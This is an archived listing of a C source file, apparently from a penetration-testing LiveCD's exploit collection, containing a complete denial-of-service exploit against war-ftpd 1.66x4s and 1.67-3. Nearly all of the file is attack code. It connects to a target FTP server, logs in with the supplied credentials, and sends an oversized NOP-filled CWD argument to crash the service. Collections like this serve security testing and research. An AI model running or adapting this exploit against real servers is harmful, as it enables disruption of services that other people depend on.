home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / warftpd / warftpd-dos.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  85 lines

---

1. /*--------------------------------------------------------------*/
2. /* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
3. /*--------------------------------------------------------------*/
4.  
5. #include    <stdio.h>
6. #include    <string.h>
7. #include    <winsock.h>
8. #include    <windows.h>
9.  
10. #define     FTP_PORT        21
11. #define     MAXBUF          8182
12. //#define     MAXBUF          553
13. #define     MAXPACKETBUF    32000
14. #define     NOP             0x90
15.  
16. void main(int argc,char *argv[])
17. {
18.     SOCKET               sock;
19.     unsigned long        victimaddr;
20.     SOCKADDR_IN          victimsockaddr;
21.     WORD                 wVersionRequested;
22.     int                  nErrorStatus;
23.     static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
24.     hostent              *victimhostent;
25.     WSADATA              wsa;
26.  
27.     if (argc < 3){
28.         printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
29.     }
30.  
31.     wVersionRequested = MAKEWORD(1, 1);
32.     nErrorStatus = WSAStartup(wVersionRequested, &wsa);
33.     if (atexit((void (*)(void))(WSACleanup))) {
34.         fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
35.     }
36.  
37.     if ( nErrorStatus != 0 ) {
38.         fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
39.     }
40.  
41.     if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
42.         fprintf(stderr,"Can't create socket.\n"); exit(-1);
43.     }
44.  
45.  
46.     victimaddr = inet_addr((char*)argv[1]);
47.     if (victimaddr == -1) {
48.         victimhostent = gethostbyname(argv[1]);
49.         if (victimhostent == NULL) {
50.             fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
51.         }
52.         else
53.             victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
54.     }
55.  
56.     victimsockaddr.sin_family        = AF_INET;
57.     victimsockaddr.sin_addr.s_addr  = victimaddr;
58.     victimsockaddr.sin_port  = htons((unsigned short)FTP_PORT);
59.     memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
60.  
61.     if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
62.         fprintf(stderr,"Connection refused.\n"); exit(-1);
63.     }
64.  
65.     printf("Attacking war-ftpd ...\n");
66.     recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
67.     sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
68.     send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
69.     recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
70.     sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
71.     send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
72.     recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
73.  
74.     memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
75.  
76.     sprintf((char *)packetbuf,"CWD %s\r\n",buf);
77.     send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
78.  
79.     Sleep(100);
80.     shutdown(sock, 2);
81.     closesocket(sock);
82.     WSACleanup();
83.     printf("done.\n");
84. }
85.